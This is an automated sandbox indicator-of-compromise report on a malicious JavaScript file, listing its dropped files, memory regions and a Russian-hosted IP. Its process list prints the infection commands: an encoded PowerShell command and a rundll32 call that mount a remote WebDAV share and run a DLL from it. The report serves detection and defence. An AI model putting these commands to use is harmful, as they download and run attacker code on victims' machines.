IOC Report
634624051181209037.js

loading gif

Files

File Path
Type
Category
Malicious
634624051181209037.js
ASCII text, with very long lines (65536), with no line terminators
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ptl4kggm.me0.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qnf1x5ra.alu.ps1
ASCII text, with no line terminators
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\634624051181209037.js"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXAA5ADQALgAxADUAOQAuADEAMQAzAC4ANAA4AEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAgADsAIAByAHUAbgBkAGwAbAAzADIAIABcAFwAOQA0AC4AMQA1ADkALgAxADEAMwAuADQAOABAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAMwAxADgANQAyADIANQA4ADkAMAAxADAAMAAyADYALgBkAGwAbAAsAEUAbgB0AHIAeQA=
malicious
C:\Windows\System32\rundll32.exe
"C:\Windows\system32\rundll32.exe" \\94.159.113.48@8888\davwwwroot\318522589010026.dll,Entry
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\net.exe
"C:\Windows\system32\net.exe" use \\94.159.113.48@8888\davwwwroot\

URLs

Name
IP
Malicious
http://94.159.113.48:8888/U
unknown
http://94.159.113.48:8888/pace
unknown
https://aka.ms/pscore6
unknown
http://www.microsoft.2
unknown
https://aka.ms/pscore68
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://94.159.113.48:8888/
unknown

IPs

IP
Domain
Country
Malicious
94.159.113.48
unknown
Russian Federation
malicious

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe
JScriptSetScriptStateStarted

Memdumps

Base Address
Regiontype
Protect
Malicious
1DEF66DE000
heap
page read and write
1DEF81E3000
heap
page read and write
7FFB22715000
unkown
page readonly
1DEF81E0000
heap
page read and write
1DEF820C000
heap
page read and write
7FFAAC800000
trusted library allocation
page read and write
1DEF63E3000
heap
page read and write
27415B60000
heap
page read and write
A73B1FE000
stack
page read and write
1DEF66DD000
heap
page read and write
7FFAAC5F6000
trusted library allocation
page read and write
22D56577000
heap
page execute and read and write
7FFAAC600000
trusted library allocation
page execute and read and write
1DEF6462000
heap
page read and write
A9B5AFE000
stack
page read and write
1DEF647C000
heap
page read and write
1DEF6499000
heap
page read and write
1DEF645B000
heap
page read and write
27415EA4000
heap
page read and write
7FFB22730000
unkown
page readonly
1CDFE782000
heap
page read and write
1CDFE750000
heap
page read and write
27418EF0000
heap
page read and write
1DEF822B000
heap
page read and write
7FFB22706000
unkown
page readonly
A73B7FF000
stack
page read and write
1DEF81C4000
heap
page read and write
7FFAAC7D0000
trusted library allocation
page read and write
1DEF81EA000
heap
page read and write
7FFB22750000
unkown
page read and write
1DEF81F7000
heap
page read and write
27415B89000
heap
page read and write
1CDFE77C000
heap
page read and write
22D6EDE0000
heap
page read and write
1DEF8315000
heap
page read and write
A9B55DE000
stack
page read and write
1DEF66DC000
heap
page read and write
27418EF3000
heap
page read and write
A9B5B3E000
stack
page read and write
1DEF822B000
heap
page read and write
1DEF8218000
heap
page read and write
1DEF81EA000
heap
page read and write
27415B76000
heap
page read and write
5FDF2FF000
stack
page read and write
1DEF6460000
heap
page read and write
22D56F1A000
trusted library allocation
page read and write
1CDFE7B8000
heap
page read and write
7FFAAC790000
trusted library allocation
page read and write
22D6ECD0000
heap
page read and write
22D54EE5000
heap
page read and write
1DEF6499000
heap
page read and write
22D54C42000
heap
page read and write
22D56B0B000
trusted library allocation
page read and write
1DEF8213000
heap
page read and write
22D56DB0000
trusted library allocation
page read and write
1DEF641A000
heap
page read and write
7DF4C6820000
trusted library allocation
page execute and read and write
1DEF81E0000
heap
page read and write
E31C2FE000
stack
page read and write
A73B6FF000
stack
page read and write
22D66A71000
trusted library allocation
page read and write
7FFB22746000
unkown
page readonly
7FFAAC810000
trusted library allocation
page read and write
22D54C7B000
heap
page read and write
27415B61000
heap
page read and write
5FDF07B000
stack
page read and write
22D56BC6000
trusted library allocation
page read and write
1CDFE7AC000
heap
page read and write
7FFAAC5F0000
trusted library allocation
page read and write
7FFAAC7C0000
trusted library allocation
page read and write
1DEF6467000
heap
page read and write
22D6F0B0000
heap
page read and write
1DEF81E6000
heap
page read and write
22D56B8F000
trusted library allocation
page read and write
27415EAB000
heap
page read and write
1DEF81E2000
heap
page read and write
7FFAAC860000
trusted library allocation
page read and write
A9B5C39000
stack
page read and write
7FFAAC7E0000
trusted library allocation
page read and write
1DEF6300000
heap
page read and write
7FFAAC700000
trusted library allocation
page execute and read and write
1CDFE6B0000
heap
page read and write
27415B65000
heap
page read and write
1DEF6499000
heap
page read and write
22D56B74000
trusted library allocation
page read and write
7FFAAC542000
trusted library allocation
page read and write
A9B5D3E000
stack
page read and write
22D56B77000
trusted library allocation
page read and write
1CDFE6A0000
heap
page read and write
1CDFE78D000
heap
page read and write
22D54CB7000
heap
page read and write
7FFAAC710000
trusted library allocation
page execute and read and write
22D56580000
heap
page read and write
1DEF62D0000
heap
page read and write
7FFAAC820000
trusted library allocation
page read and write
A9B54D3000
stack
page read and write
7FFB226F1000
unkown
page execute read
1DEF66D9000
heap
page read and write
22D6EBC5000
heap
page read and write
22D56A8B000
trusted library allocation
page read and write
1DEF81C7000
heap
page read and write
7FFAAC543000
trusted library allocation
page execute and read and write
7FFB22710000
unkown
page read and write
1DEF81FC000
heap
page read and write
1DEF822B000
heap
page read and write
5FDF27C000
stack
page read and write
1DEF8210000
heap
page read and write
1DEF641A000
heap
page read and write
1DEF6390000
heap
page read and write
22D6EDB0000
heap
page execute and read and write
1DEF81E0000
heap
page read and write
7FFAAC840000
trusted library allocation
page read and write
7FFAAC6E0000
trusted library allocation
page read and write
1DEF62E0000
heap
page read and write
1DEF6499000
heap
page read and write
22D569B0000
heap
page execute and read and write
22D54C00000
heap
page read and write
1DEF8315000
heap
page read and write
A9B555F000
stack
page read and write
A9B5EBE000
stack
page read and write
1DEF6470000
heap
page read and write
22D6EC61000
heap
page read and write
22D6EC76000
heap
page read and write
27415B8C000
heap
page read and write
1DEF81EC000
heap
page read and write
22D56A60000
heap
page read and write
1CDFE720000
remote allocation
page read and write
1DEF648F000
heap
page read and write
1DEF6499000
heap
page read and write
22D54C77000
heap
page read and write
22D54B00000
heap
page read and write
1DEF8213000
heap
page read and write
22D56500000
heap
page read and write
27417650000
heap
page read and write
1CDFE786000
heap
page read and write
22D54C8F000
heap
page read and write
1DEF81FA000
heap
page read and write
22D56550000
trusted library allocation
page read and write
22D56ADE000
trusted library allocation
page read and write
7FFAAC750000
trusted library allocation
page read and write
27415B81000
heap
page read and write
7FFAAC544000
trusted library allocation
page read and write
1DEF66D5000
heap
page read and write
27415EA0000
heap
page read and write
7FFB22731000
unkown
page execute read
7FFAAC850000
trusted library allocation
page read and write
1DEF81E7000
heap
page read and write
22D54EE0000
heap
page read and write
1DEF66D9000
heap
page read and write
1DEF6460000
heap
page read and write
1DEF81C6000
heap
page read and write
27415AF0000
heap
page read and write
27415B4E000
heap
page read and write
22D54BE0000
heap
page read and write
22D6EBE1000
heap
page read and write
1DEF822B000
heap
page read and write
22D54D13000
heap
page read and write
22D56530000
trusted library allocation
page read and write
1DEF8342000
heap
page read and write
1DEF648F000
heap
page read and write
22D54C30000
heap
page read and write
A9B5BB7000
stack
page read and write
7FFAAC660000
trusted library allocation
page execute and read and write
22D6EBEF000
heap
page read and write
1DEF81E0000
heap
page read and write
1DEF648F000
heap
page read and write
22D56A71000
trusted library allocation
page read and write
1DEF81F2000
heap
page read and write
27415B5C000
heap
page read and write
22D56B7A000
trusted library allocation
page read and write
7FFAAC740000
trusted library allocation
page read and write
1DEF81E0000
heap
page read and write
A9B587F000
stack
page read and write
1DEF6473000
heap
page read and write
1DEF6469000
heap
page read and write
1DEF81D5000
heap
page read and write
1CDFE730000
heap
page read and write
1DEF648F000
heap
page read and write
22D6EC30000
heap
page read and write
1DEF6485000
heap
page read and write
1CDFE734000
heap
page read and write
7FFAAC7B0000
trusted library allocation
page read and write
1DEF6478000
heap
page read and write
5FDF1FE000
stack
page read and write
27415AE0000
heap
page read and write
27415B5C000
heap
page read and write
1DEF648F000
heap
page read and write
7FFAAC760000
trusted library allocation
page read and write
1DEF66DD000
heap
page read and write
1CDFE720000
remote allocation
page read and write
22D66A80000
trusted library allocation
page read and write
1DEF6460000
heap
page read and write
A9B5CBB000
stack
page read and write
7FFAAC6F1000
trusted library allocation
page read and write
1DEF6465000
heap
page read and write
1DEF66DE000
heap
page read and write
A9B5A7E000
stack
page read and write
22D56B8B000
trusted library allocation
page read and write
22D6EC5C000
heap
page read and write
A73B9FD000
stack
page read and write
27415B6D000
heap
page read and write
1DEF8224000
heap
page read and write
7FFAAC770000
trusted library allocation
page read and write
1DEF81E7000
heap
page read and write
1DEF81E5000
heap
page read and write
7FFAAC5FC000
trusted library allocation
page execute and read and write
1DEF63CD000
heap
page read and write
1DEF648F000
heap
page read and write
22D56940000
trusted library allocation
page read and write
7FFAAC780000
trusted library allocation
page read and write
22D56E2E000
trusted library allocation
page read and write
1DEF81F2000
heap
page read and write
7FFAAC626000
trusted library allocation
page execute and read and write
22D6EB80000
heap
page read and write
1DEF6462000
heap
page read and write
A73BBFB000
stack
page read and write
22D54C73000
heap
page read and write
27415B48000
heap
page read and write
A9B5AF8000
stack
page read and write
A73B0F5000
stack
page read and write
7FFAAC7A0000
trusted library allocation
page read and write
22D6ECB0000
heap
page read and write
1DEF822B000
heap
page read and write
7FFAAC550000
trusted library allocation
page read and write
1DEF6476000
heap
page read and write
1DEF8275000
heap
page read and write
22D66ADE000
trusted library allocation
page read and write
22D6EBBE000
heap
page read and write
1DEF822B000
heap
page read and write
27415B10000
heap
page read and write
7FFB22752000
unkown
page readonly
A9B59FF000
stack
page read and write
A73B2FF000
stack
page read and write
7FFAAC6FA000
trusted library allocation
page read and write
22D54C6F000
heap
page read and write
1DEF81EE000
heap
page read and write
27419390000
trusted library allocation
page read and write
1DEF647B000
heap
page read and write
7FFAAC722000
trusted library allocation
page read and write
22D56585000
heap
page read and write
27418EB0000
heap
page read and write
1DEF82C1000
heap
page read and write
7FFAAC54D000
trusted library allocation
page execute and read and write
1CDFE757000
heap
page read and write
22D54CBD000
heap
page read and write
1DEF81C5000
heap
page read and write
22D56570000
heap
page execute and read and write
A9B5DBE000
stack
page read and write
1DEF6486000
heap
page read and write
1DEF63A0000
heap
page read and write
7FFB22755000
unkown
page readonly
1CDFE6D0000
heap
page read and write
22D56B88000
trusted library allocation
page read and write
A9B58FD000
stack
page read and write
7FFAAC830000
trusted library allocation
page read and write
22D56F74000
trusted library allocation
page read and write
A73B5FE000
stack
page read and write
22D56ABF000
trusted library allocation
page read and write
1DEF81EF000
heap
page read and write
1DEF81C8000
heap
page read and write
1DEF6462000
heap
page read and write
E31C37E000
stack
page read and write
1CDFE7BF000
heap
page read and write
1DEF6499000
heap
page read and write
1CDFE784000
heap
page read and write
1DEF822B000
heap
page read and write
1DEF822B000
heap
page read and write
1DEF66D0000
heap
page read and write
27415B40000
heap
page read and write
1DEF66DB000
heap
page read and write
A9B5F3C000
stack
page read and write
1DEF8213000
heap
page read and write
1DEF81E2000
heap
page read and write
A9B597E000
stack
page read and write
E31C27A000
stack
page read and write
22D56AD8000
trusted library allocation
page read and write
22D6EB85000
heap
page read and write
1DEF81F1000
heap
page read and write
1CDFE7A6000
heap
page read and write
7FFB22712000
unkown
page readonly
1CDFE78F000
heap
page read and write
27415B70000
heap
page read and write
22D56DF7000
trusted library allocation
page read and write
1DEF6425000
heap
page read and write
A73B3FD000
stack
page read and write
1DEF81C2000
heap
page read and write
1DEF81EA000
heap
page read and write
A73B8FE000
stack
page read and write
7FFAAC730000
trusted library allocation
page execute and read and write
A9B5E3E000
stack
page read and write
5FDF17E000
stack
page read and write
1DEF8200000
heap
page read and write
1DEF81CD000
heap
page read and write
22D56BCD000
trusted library allocation
page read and write
1DEF646A000
heap
page read and write
1DEF81FA000
heap
page read and write
1DEF66DE000
heap
page read and write
1DEF82C0000
heap
page read and write
1DEF63CE000
heap
page read and write
1DEF81DC000
heap
page read and write
7FFB226F0000
unkown
page readonly
1CDFE720000
remote allocation
page read and write
22D56560000
heap
page readonly
5FDF0FE000
stack
page read and write
7FFAAC7F0000
trusted library allocation
page read and write
1DEF81C0000
heap
page read and write
There are 296 hidden memdumps, click here to show them.